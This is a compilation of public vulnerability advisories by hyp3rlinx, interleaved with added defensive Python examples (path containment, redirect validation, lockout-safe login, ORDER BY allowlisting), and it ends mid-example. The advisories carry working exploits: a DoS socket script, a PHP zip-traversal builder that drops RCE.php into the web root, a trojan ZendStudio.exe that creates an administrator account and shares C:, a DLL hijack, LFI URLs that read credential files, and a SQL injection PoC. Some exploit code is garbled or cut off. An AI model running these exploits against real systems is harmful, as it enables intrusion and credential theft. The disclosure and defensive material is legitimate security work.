1) Open the settings window for Axessh, choose Run, then click "Run as EXE". This launches "xwpsshd.exe", which crashes with "bad protocol version".

import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
ip = raw_input("[IP]> ")
port = 22
payload = "A"*2000
s = socket.create_connection((ip,port))
s.send(payload)

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

hyp3rlinx
wincvs-2.0.2.4 Privilege Escalation
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINCVS-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec

Vendor:
=======
cvsgui.sourceforge.net
www.wincvs.org

Product:
========
WinCvs v2.1.1.1 (Build 1), downloads as wincvs-2.0.2.4 (v2.0.2.4)

WinCVS is a free app for Windows that will help you simplify the development of files for groups of people working on the same software project.

Vulnerability Type:
===================
Privilege Escalation

CVE Reference:
==============
N/A

Vulnerability Details:
======================
WinCvs.exe installs a service with an unquoted service path running with SYSTEM privileges. To exploit it, a local attacker must place a malicious executable named "Program.exe" in the path of the service. After a service restart or system reboot, this could allow an authorized local user to execute arbitrary code with elevated privileges on the system.

Proof:
======
C:\Users\hyp3rlinx>sc qc CVS
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CVS
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\cvsnt\cvsservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CVSNT
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

hyp3rlinx
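The check an administrator would run over the `sc qc` output above, as an added example (not part of the advisory): it parses the BINARY_PATH_NAME line, decides whether the image path is unquoted and contains spaces, lists the alternative images the service control manager would try before the real one, and produces the quoted form to set with `sc config <name> binPath= "..."`. The sample output is the advisory's own; the helper names are this example's.

```python
"""Detect an unquoted service binary path with spaces from `sc qc` output.

Added example, not part of the advisory or of WinCvs. The sample text below is
the `sc qc CVS` output shown in the advisory.
"""
import re

SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CVS
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\cvsnt\\cvsservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CVSNT
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Image path ends at the first ".exe"; anything after it is arguments.
_EXE_PREFIX = re.compile(r"(.+?\.exe)(.*)", re.IGNORECASE | re.DOTALL)


def binary_path_from_sc_qc(output: str) -> str:
    """Return the BINARY_PATH_NAME value from `sc qc` output."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", output)
    if not m:
        raise ValueError("no BINARY_PATH_NAME line found")
    return m.group(1).strip()


def split_image_and_args(binary_path: str):
    """Split an unquoted binPath into (image path, trailing arguments)."""
    m = _EXE_PREFIX.match(binary_path.strip())
    return (m.group(1), m.group(2)) if m else (binary_path.strip(), "")


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """True when the image path is not wrapped in quotes and contains a space."""
    p = binary_path.strip()
    if p.startswith('"'):
        return False
    image, _ = split_image_and_args(p)
    return " " in image


def search_order(binary_path: str) -> list:
    """Images the service control manager tries, in order, for an unquoted path.

    Each space is a candidate end of the image name and ".exe" is appended to
    the shorter candidates, which is why a planted C:\\Program.exe is found
    before the real service binary.
    """
    image, _ = split_image_and_args(binary_path)
    parts = image.split(" ")
    return [" ".join(parts[:i]) + (".exe" if i < len(parts) else "")
            for i in range(1, len(parts) + 1)]


def quoted_bin_path(binary_path: str) -> str:
    """The fix: quote the image path and keep any arguments outside the quotes."""
    p = binary_path.strip()
    if p.startswith('"'):
        return p
    image, args = split_image_and_args(p)
    return f'"{image}"{args}'


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SAMPLE_SC_QC)
    print("unquoted with spaces:", is_unquoted_with_spaces(path))
    print("lookup order:", search_order(path))
    print("fixed binPath:", quoted_bin_path(path))
```

The same functions work on the output of `sc qc` for every service (`sc query` to list names), which is the usual way to audit a host for this class of misconfiguration; quoting the path is the fix, and write permissions on the intermediate directories (here `C:\` and `C:\Program Files (x86)`) decide whether the unquoted path is actually exploitable.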
Puppet Enterprise Web Interface User Enumeration
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-USER-ENUMERATION.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.puppet.com

Product:
========
Puppet Enterprise Web Interface
Tested in version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure.

Vulnerability Type:
===================
User Enumeration

CVE Reference:
==============
N/A

Vulnerability Details:
======================
By sending remote HTTP requests to the Puppet Enterprise Web Interface it is possible to enumerate valid user account names by sending more than 10 login requests. If the user does not exist, we continue to get the 'Authentication failed.' HTTP response from the victim server. However, if the user does exist, we no longer receive that message, confirming that the user exists.

Exploit code(s):
================
Send the login request 11 times; after 10 we will know whether the user exists or not.

FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=IDONTEXIST -d password=1

HTTP 200 OK
'Authentication failed.'

FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d password=1

HTTP 200 OK

Disclosure Timeline:
====================
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Version: 2016.4.0
October 17, 2016 : Public Disclosure

Severity Level:
===============
Low

hyp3rlinx
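The defect above is a response oracle: the lockout that protects an existing account changes the reply, so the reply itself reveals whether the account exists. The added example below (this editor's code, not Puppet's) models that behaviour in a vulnerable handler and puts the hardened version beside it, which enforces the same lockout but answers identically in every failure case and records the lockout server-side. The user table and threshold are constructed sample values.

```python
"""Response oracle in a login endpoint: vulnerable handler beside a hardened one.

Added example, not Puppet Enterprise code. The credential store and the
10-attempt threshold are constructed to mirror the advisory above.
"""
from collections import defaultdict

LOCKOUT_THRESHOLD = 10
GENERIC_FAILURE = (200, "Authentication failed.")

# Constructed sample store; password hashing is omitted to keep the focus on responses.
KNOWN_USERS = {"admin": "correct horse battery staple"}


class VulnerableLogin:
    """Locks real accounts after N failures and leaks that through the response."""

    def __init__(self):
        self.failures = defaultdict(int)

    def login(self, username, password):
        if username not in KNOWN_USERS:
            return GENERIC_FAILURE            # unknown names are never locked: message keeps coming
        if self.failures[username] >= LOCKOUT_THRESHOLD:
            return (200, "")                  # locked: different body, so the account must exist
        if KNOWN_USERS[username] == password:
            return (303, "/")
        self.failures[username] += 1
        return GENERIC_FAILURE


class HardenedLogin:
    """Same lockout policy, but every failure looks the same from outside."""

    def __init__(self):
        self.failures = defaultdict(int)
        self.audit_log = []                   # server-side record for the SOC, never sent to the client

    def login(self, username, password):
        # Count failures for every submitted name, existing or not, so the
        # lockout state itself cannot be probed from outside.
        if self.failures[username] >= LOCKOUT_THRESHOLD:
            self.audit_log.append(f"rejected login for locked-out name {username!r}")
            return GENERIC_FAILURE
        if KNOWN_USERS.get(username) == password:
            self.failures[username] = 0
            return (303, "/")
        self.failures[username] += 1
        if self.failures[username] == LOCKOUT_THRESHOLD:
            self.audit_log.append(f"lockout threshold reached for {username!r}")
        return GENERIC_FAILURE


def responses_differ(handler_cls, attempts=11):
    """True when the final reply for a real account differs from one for a bogus account."""
    handler = handler_cls()
    real = [handler.login("admin", "wrong") for _ in range(attempts)][-1]
    bogus = [handler.login("IDONTEXIST", "wrong") for _ in range(attempts)][-1]
    return real != bogus


if __name__ == "__main__":
    print("vulnerable handler distinguishable:", responses_differ(VulnerableLogin))
    print("hardened handler distinguishable:", responses_differ(HardenedLogin))
```

Two caveats for a real deployment: the failure table in the hardened handler must be bounded (expire entries, or key them by source address as well) or unknown names become a memory sink, and response timing must be kept equal too, since a code path that skips the password comparison for unknown users leaks the same bit through latency.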
Puppet Enterprise Web Interface Authentication Redirect
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.puppet.com

Product:
========
Puppet Enterprise Web Interface
Version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure.

Vulnerability Type:
===================
Authentication Redirect

CVE Reference:
==============
CVE-2016-5715

Vulnerability Details:
======================
When logging into the Puppet Enterprise Web Interface, users can be redirected to attacker-controlled servers. If a user logs in using an attacker-supplied authentication link, this can result in credential theft, etc.

Fixed in version 2016.4.0

References:
https://puppet.com/security/cve/cve-2016-5715

Exploit code(s):
================
To bypass the character filters you need to pass double forward slashes "//", or the redirect will fail.

https://victim-puppet-server/auth/login?redirect=//attacker-server

Disclosure Timeline:
====================
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Fix: in version 2016.4.0
October 17, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

hyp3rlinx
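The "//" detail above is the classic failure of a redirect filter that only asks whether the value starts with a slash: browsers read `//host` as a protocol-relative URL to another origin. The added example below (this editor's code, not Puppet's) puts that weak check beside a validator that accepts only a path on the current origin, including the percent-encoded and backslash variants of the same trick.

```python
"""Validate a post-login redirect target: the weak check beside the fixed one.

Added example, not Puppet Enterprise code. Function names are this example's.
"""
from urllib.parse import unquote, urlsplit


def naive_is_local(redirect: str) -> bool:
    """Weak check: 'starts with a slash, so it must be a local path'."""
    return redirect.startswith("/")


def is_safe_local_redirect(redirect: str) -> bool:
    """Accept only same-origin paths: one leading '/', no scheme, no authority."""
    if not redirect:
        return False
    # Check the raw value and a percent-decoded copy: frameworks often decode
    # the parameter before they build the Location header.
    for candidate in (redirect, unquote(redirect)):
        if not candidate.startswith("/") or candidate.startswith("//"):
            return False
        # Browsers normalise '\' to '/', so '/\host' would become '//host'.
        if "\\" in candidate or any(ord(c) < 0x20 for c in candidate):
            return False
        parts = urlsplit(candidate)
        if parts.scheme or parts.netloc:
            return False
    return True


def resolve_redirect(redirect: str, default: str = "/") -> str:
    """Return the target to redirect to, falling back to a fixed local default."""
    return redirect if is_safe_local_redirect(redirect) else default


if __name__ == "__main__":
    for value in ("/dashboard", "//attacker-server", "/%2F%2Fattacker-server",
                  "/\\attacker-server", "http://attacker-server/"):
        print(f"{value!r:28} naive={naive_is_local(value)!s:5} safe={is_safe_local_redirect(value)}")
```

Falling back to a fixed default rather than raising keeps the login flow working for users who arrive with a malformed parameter; the rejected value is still worth logging, because a burst of `//` redirect parameters in the access log is a usable detection signal for this class of attack.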
Oracle Netbeans IDE v8.1 Import Directory Traversal
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.oracle.com

Product:
========
Netbeans IDE v8.1

Vulnerability Type:
===================
Import Directory Traversal

CVE Reference:
==============
CVE-2016-5537

Vulnerability Details:
======================
This was part of the Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import). The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of NetBeans.

The vulnerability is in the way NetBeans processes ".zip" archives to be imported as a project. If a user imports a malicious project containing "../" characters, the import will fail, yet the "../" is still processed. An attacker can then place malicious scripts outside of the target directory, and inside the web root if the user is running a local server, etc. It may then be possible to execute remote commands on the affected system by later visiting the URL and accessing the script if that web server is public facing; if it is not, it may still be subject to abuse by malicious internal users. Moreover, it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.

References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW

Exploit Code(s):
================
, , ";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='';
if(!empty($argv[2])&_numeric($argv[2])){
    $depth=$argv[2];
}else{
    echo "Second flag must be numeric!, you supplied '$argv[2]'";
    exit();
}
if(strtolower($argv[3])!="y"){
    if(!empty($argv[3])){
        $exploit_file=$argv[3];
    }
    if(!empty($argv[4])){
        $cmd=$argv[4];
    }else{
        echo "Usage: enter a payload for file $exploit_file wrapped in double quotes";
        exit();
    }
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo " hyp3rlinx ===";
?>

Disclosure Timeline:
====================
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
===============
CVSS VERSION 3.0 RISK 5.7

hyp3rlinx
Snort v2.9.7.0-WIN32 DLL Hijack
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.snort.org

Product:
========
Snort v2.9.7.0-WIN32

Snort is an open-source, free and lightweight network intrusion detection system (NIDS) software for Linux and Windows to detect emerging threats.

Vulnerability Type:
===================
DLL Hijack

CVE Reference:
==============
CVE-2016-1417

Vulnerability Details:
======================
snort.exe can be exploited to execute arbitrary code on a victim's system via DLL hijacking; the vulnerable DLL is "tcapi.dll". The hijack occurs if a user opens a ".pcap" file from a remote share using snort.exe and the DLL exists in that directory.

Exploit code(s):
================
Create tcapi.dll

#include <windows.h>

//gcc -c tcapi.c
//gcc -shared -o tcapi.dll tcapi.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL, "DLL Hijacking", "Done!", MB_OK);
            break;
    }
    return 0;
}

1) Create any empty file on a remote directory share with a .pcap extension
2) Place the arbitrary DLL named "tcapi.dll" in the remote share
3) Open the .pcap file with snort.exe
4) BAM!

Disclosure Timeline:
====================
Vendor Notification: April 21, 2016
September 29, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

hyp3rlinx
ZendStudio IDE v13.5.1 Privilege Escalation
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.zend.com

Product:
========
ZendStudio IDE v13.5.1

Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile app with source code.

Vulnerability Type:
===================
Privilege Escalation

CVE Reference:
==============
N/A

Vulnerability Details:
======================
ZendStudio IDE uses weak, insecure permission settings on its files/directory: the Everyone group has full access to them. This allows low privileged users to execute arbitrary code in the security context of ANY other user with elevated privileges on the affected system.

"Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest and LOCAL_SERVICE. Any user (even Guest) will be able to replace, modify or change the file. This would give an attacker the ability to inject code or replace the ZendStudio executable and have it run in the context of the system.

e.g.

c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe
ZendStudio.exe Everyone:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)

x86_64 version ...

c:\Program Files\Zend>icacls * | more
Zend Studio 13.5.1 Everyone:(F)
                   Everyone:(OI)(CI)(IO)(F)
                   NT SERVICE\TrustedInstaller:(I)(F)
                   NT SERVICE\TrustedInstaller:(I)(CI)(I
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
                   BUILTIN\Administrators:(I)(F)
                   BUILTIN\Administrators:(I)(OI)(CI)(IO
                   BUILTIN\Users:(I)(RX)
                   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                   CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Exploit code(s):
================
1) Compile the 'C' code below and name it "ZendStudio.exe"

#include <windows.h>

int main(void){
    system("net user hacker abc123 /add");
    system("net localgroup Administrators hacker /add");
    system("net share SHARE_NAME=c:\ /grant:hacker,full");
    WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
    return 0;
}

2) Rename the original "ZendStudio.exe" to "~ZendStudio.exe"
3) Place our malicious "ZendStudio.exe" in the ZendStudio directory
4) Log out and wait for a more privileged user to log in and use ZendStudio IDE, then BOOM! Later, go back and log in with your shiny new account.

Disclosure Timeline:
====================
Vendor Notification: September 30, 2016
October 8, 2016 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

hyp3rlinx
WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.wso2.com

Product:
========
WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.

Vulnerability Type:
===================
Local File Inclusion (LFI)

CVE Reference:
==============
CVE-2016-4314

Vulnerability Details:
======================
An authenticated user can download configuration files from the filesystem via the downloadArchivedLogFiles operation of the LogViewer admin service. The request to the admin service accepts a file path relative to the Carbon log file directory (i.e. /repository/logs), hence it can access any file on the file system.

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098

Example: accessing the registry.xml file via Local File Inclusion exposes the MySQL passwords.

mysql-db
jdbc:mysql://localhost:3306/regdb
regadmin
regadmin
com.mysql.jdbc.Driver
80
6000
5

Exploit code(s):
================
LFI to read database creds, the truststore key file, web.xml etc...

1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml

2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml

3) Access the truststore key file
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks

4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml

Disclosure Timeline:
====================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

HYP3RLINX
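The NetBeans import traversal and the WSO2 log download above are the same bug in two places: a relative path from an untrusted source is joined to a base directory without checking that the result stays inside it. The added example below (this editor's code, not NetBeans or WSO2 code) uses one `safe_join()` helper for both cases: a zip importer that refuses entries whose names climb out of the destination, and a `logFile`-style parameter mapped onto a log directory. The archive and the directory layout are constructed in a temporary directory for the demonstration.

```python
"""Keep untrusted relative paths inside a base directory.

Added example, not NetBeans or WSO2 code. Covers both advisories above:
archive entries such as "..\\..\\htdocs\\x" (the NetBeans import case) and a
request parameter such as "../../repository/conf/registry.xml" (the WSO2
log-download case). The sample archive is constructed in memory.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple


def safe_join(base: str, untrusted: str) -> Optional[str]:
    """Resolve `untrusted` under `base`; return None if it would escape."""
    base_abs = os.path.realpath(base)
    rel = untrusted.replace("\\", "/")            # treat '\' as a separator too
    if not rel or rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        return None                                # absolute or drive-letter path
    target = os.path.realpath(os.path.join(base_abs, rel))
    if target == base_abs or os.path.commonpath([base_abs, target]) != base_abs:
        return None                                # climbed out via '..' or a symlink
    return target


def safe_extract(zip_bytes: bytes, dest: str) -> Tuple[List[str], List[str]]:
    """Extract an archive entry by entry, skipping entries that escape `dest`.

    Returns (extracted entry names, rejected entry names). Writing through
    zf.open() rather than ZipFile.extract() mirrors a hand-written importer,
    which is where this check is easy to forget.
    """
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = safe_join(dest, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def log_file_path(logs_dir: str, requested: str) -> Optional[str]:
    """Map a 'logFile' request parameter onto a file under the log directory."""
    return safe_join(logs_dir, requested)


def build_sample_zip() -> bytes:
    """Constructed sample: one normal entry and one that tries to climb out."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("project/build.xml", "<project/>")
        zf.writestr("..\\..\\htdocs\\outside.txt", "must not land outside dest")
    return buf.getvalue()


def demo() -> dict:
    """Run the importer and the log-path check in a fresh temporary directory."""
    dest = tempfile.mkdtemp()
    extracted, rejected = safe_extract(build_sample_zip(), dest)
    return {
        "dest": os.path.realpath(dest),
        "extracted": extracted,
        "rejected": rejected,
        "build_xml_exists": os.path.isfile(os.path.join(dest, "project", "build.xml")),
        "lfi_attempt": log_file_path(dest, "../../repository/conf/registry.xml"),
        "normal_log": log_file_path(dest, "wso2carbon.log"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

`os.path.realpath` on both sides is what makes the containment check hold in the presence of symlinks and `..`; comparing string prefixes without it would accept `/var/logs-evil` as inside `/var/logs`. For the download case, an allowlist of file names is stronger still when the set of legitimate files is known in advance.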
VMWare vSphere Web Client Flash XSS
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt
[+] ISR: apparitionsec

Vendor:
=======
www.vmware.com

Product:
========
VMWare vSphere Web Client v5.1 - 6.0

A server virtualization platform from VMware. Also referred to as a cloud operating system or virtualized data center platform, VMware vSphere enables IT departments to efficiently place application workloads on the most cost-effective compute resource available. VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1 hypervisor that functions as the virtualization server; the VMware vCenter Server, which manages vSphere environments; the VMware vSphere Client, which is used to install and manage virtual machines through the hypervisor; and VMware VMFS, the file system component from VMware.

Vulnerability Type:
===================
Flash XSS

CVE Reference:
==============
CVE-2016-2078

Vulnerability Details:
======================
VMWare vSphere Web Client is vulnerable to Flash-based XSS through the loading of arbitrary .SWF files via the 'flashvars' parameter. Flashvars is a Flash Player feature that allows passing of variables to the '_root' level of a Flash movie from the hosting webpage. Attackers can exploit this to call arbitrary Flash ActionScript functions on the victim's Flash Player client through attacker-supplied SWF files that execute in the same security context as that of the vSphere Web Client.

e.g.

flashvars: 'locale=en_US=en_US=locales/UI-en_US.swf=http%3A%2F%2Fattacker-site%2FEvil.swf',

References:
VMSA-2016-0006
http://www.vmware.com/security/advisories/VMSA-2016-0006.html

Exploit code(s):
================
1) The attacker server needs the Flash policy file "crossdomain.xml". It grants Flash Player permission to talk to servers other than the one it's hosted on. This will allow the victim server to talk to the evil server.

e.g.

2) Send the infected link to the victim.

https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf

Disclosure Timeline:
====================
Vendor Notification: Jan 4, 2016
May 25, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
4.2 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Description:
============
Request Method(s):      [+] GET
Vulnerable Product:     [+] VMWare 5.1 - 6.0 vsphere-client
Vulnerable Parameter(s): [+] flashvars / resourceModuleURLs

hyp3rlinx
PHPBack v1.3.0 SQL Injection
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt

Vendor:
=======
www.phpback.org

Product:
========
PHPBack v1.3.0

Vulnerability Type:
===================
SQL Injection

CVE Reference:
==============
N/A

Vulnerability Details:
======================
PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter. By sending a SQL Injection query using the MySQL XPATH function ExtractValue() we can grab information from the errors generated. This is useful when we get no output except MySQL errors: we can force data extraction through the error. When ExtractValue() is used to generate an error, the evaluated results of our SQL query are embedded in the query error message. Adding a colon "0x3a" to the beginning of the query ensures that parsing will always FAIL, generating an error along with our extracted data. This method only works on MySQL version >= 5.1; we can then use the SQL LIMIT clause to move through the database information.

Users should upgrade to v1.3.1
https://github.com/ivandiazwm/phpback/releases

Exploit code(s):
================
Run from the command line...

$email=$argv[1];
$pwd=$argv[2];
if($argc<3){
    echo "PHPBack 1.3.0 SQL Injection POC\r\n";
    echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
    echo "Supported in MySQL >= 5.1 versions only\r\n";
    echo "==\r\n";
    echo "Enter Creds: \r\n";
    echo "*** by hyp3rlinx *** \r\n";
    exit();
}
$target="localhost";
$creds="email=$email=$pwd";
$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);

#authenticate
$out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($creds) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fwrite($fp, $creds);
$phpsess="";
$res="";
while (!feof($fp)) {
    $res .= fgets($fp, 128);
    if(strpos($res,"\r\n\r\n")!==FALSE){break;}
}
$sess=get_session($fp);

function get_session($sock){
    global $res;
    $idx=strpos($res,"PHPSESSID");
    $sess=substr($res,$idx,38);
    return $sess;
}

#SQL Injection
$sql="search=1=title,extractvalue(0x0a,concat(0x0a,(select USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION(\r\n";
$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);
$out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Cookie: " . $sess."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fwrite($fp, $sql);
while (!feof($fp)) {
    echo fgets($fp, 128);
}
fclose($fp);

function sock_chk(&$fp){
    if (!$fp) {echo "Cant connect!";exit();}
}
?>

Disclosure Timeline:
====================
Vendor Notification: April 17, 2016
Vendor Confirms: April 17, 2016
Vendor Release Fixed Version: April 19, 2016
April 19, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Description:
============
Request Method(s):      [+] POST
Vulnerable Product:     [+] PHPBack v1.3.0
Vulnerable Parameter(s): [+] 'orderby'

by hyp3rlinx
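An `orderby` value is the textbook case where a bound parameter does not help: binding it would make the database sort by a constant string, which is why applications paste it straight into the SQL text, and that is the hole described above. The added example below (this editor's code, not PHPBack's) shows the concatenating builder beside an allowlisting one that fails closed. SQLite stands in for MySQL, so the injected sort expression is a plain subquery rather than ExtractValue(), but the mechanism is the same: an attacker-chosen expression is evaluated as part of the query.

```python
"""ORDER BY cannot be parameterised, so the column name must be allowlisted.

Added example, not PHPBack code. The table and its rows are constructed
sample data standing in for PHPBack's ideas table.
"""
import sqlite3

ALLOWED_ORDER_COLUMNS = {"id", "title", "votes", "created"}


def build_query_vulnerable(orderby: str) -> str:
    """String concatenation: whatever the client sends becomes SQL."""
    return "SELECT id, title FROM ideas ORDER BY " + orderby


def build_query_safe(orderby: str, direction: str = "asc") -> str:
    """Allowlist the column and the direction; reject anything else."""
    if orderby not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported orderby value: {orderby!r}")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError(f"unsupported direction: {direction!r}")
    # The identifier is quoted only after it has matched the allowlist.
    return f'SELECT id, title FROM ideas ORDER BY "{orderby}" {direction.upper()}'


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE ideas (id INTEGER PRIMARY KEY, title TEXT, votes INTEGER, created TEXT);
        INSERT INTO ideas VALUES (1, 'first idea', 3, '2016-04-01');
        INSERT INTO ideas VALUES (2, 'most voted', 9, '2016-04-02');
        INSERT INTO ideas VALUES (3, 'third idea', 1, '2016-04-03');
        """
    )
    return conn


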